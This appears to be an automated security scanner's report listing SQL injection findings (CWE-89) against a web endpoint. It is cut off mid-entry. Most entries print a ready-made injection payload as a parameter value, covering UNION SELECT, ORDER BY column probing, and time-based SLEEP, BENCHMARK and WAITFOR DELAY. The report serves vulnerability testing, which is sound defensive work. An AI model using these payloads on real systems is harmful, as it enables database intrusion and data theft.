[(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1864\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1865\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \nNULL#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1866\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1867\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1868\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1869\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1870\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1871\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \") or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1872\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1873\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AS INJECTX WHERE 1=1 AND 1=1-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1874\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# or benchmark(50000000,MD5(1)\n)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1875\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1876\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 31337#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1877\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1878\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ';WAITFOR DELAY '0:0:30'--\nResponseContent-type: text/html; 